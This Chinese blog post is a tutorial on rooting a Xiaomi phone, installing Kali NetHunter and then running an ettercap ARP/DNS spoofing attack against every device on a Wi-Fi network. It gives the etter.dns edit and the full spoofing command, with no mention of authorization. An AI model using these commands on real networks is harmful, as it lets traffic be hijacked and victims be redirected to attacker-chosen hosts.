Android To Hacker Weapon-网络攻防学习社区-安全圈子-FancyPig's blog

Android To Hacker Weapon

一、背景

  • 前段时间在玩一些安全工具,时间久了,就越发对电脑那庞大的体积感到苦恼。对于一个想随时随地都能搞事情的人来说,这无异于是一件很不好的事。

  • 后来,看到一些国外的博主直接把Kali给装进了Android,不由得心驰神往,思虑一番,说干就干!

二、材料

1、必备材料

  • 一台Root后的手机

2、root权限获取(米系)

  • 申请解锁小米手机:传送门

  • 手机切换到开发板(不想变砖)

    • 在某宝上买一个开发内测账户(正式版MIUI无法开启使用root)

    • 在手机上 ==> 设置 ==> 我的设备 ==> MIUI版本 ==> 右上角3点 ==> 切换到开发版系统

    • 在开发版系统中开启开发者模式:参考

    • 开启root权限 ==> 设置 ==> 应用管理 ==> 权限 ==> Root权限管理

3、安装kali

  • 方式1:Termux+AnLinux

    • 安装Termux ==> apt update ==> apt install tsu ==>tsu(使用root权限)

    • 进入AnLinux ==>选择安装kali-NetHunter ==> 得到安装代码 ==> 复制代码于Termux运行 ==> 等待Linux容器成功安装

    • 使用管理员权限运行容器(否则部分程序无法正常使用):tsu ./start-nethunter.sh

  • 方式2: 从F-Droid安装NetHunter

    • 下载F-Droid ==> 安装 NetHunter ==> 安装NetHunter Terminal

    • 进入NetHunter ==> 安装Chroot (kali-nethunter的核心引擎)

    • 启动SSH服务(默认账户:root 默认密码:toor)

 

三、执行ARP攻击

1、修改Ettercap的DNS配置文件

  • vi /etc/ettercap/etter.dns

    • 添加:* A 任意IP(在对网络内设备执行ARP欺骗后,其他设备会将所有的域名请求都指向该IP地址)

2、启动DNS欺骗攻击

  • 复制以下代码于NetHunter终端中进行

    • ettercap -Tq -i wlan0 -M arp:remote -P dns_spoof /// /网关地址/

    • 其中///代表全IP ; /网关地址// 可以由route -n命令得到

    image-20221214154839427

    • wlan0 指的是网卡,可由ifconfig命令得到(注意网卡和对于的IP)

3、效果:

  • 同电脑执行效果一致:(参考

 

请登录后发表评论

    • Adil的头像-FancyPig's blog汉堡会员Adil徽章-人气大使-FancyPig's blog等级-LV5-FancyPig's blog作者0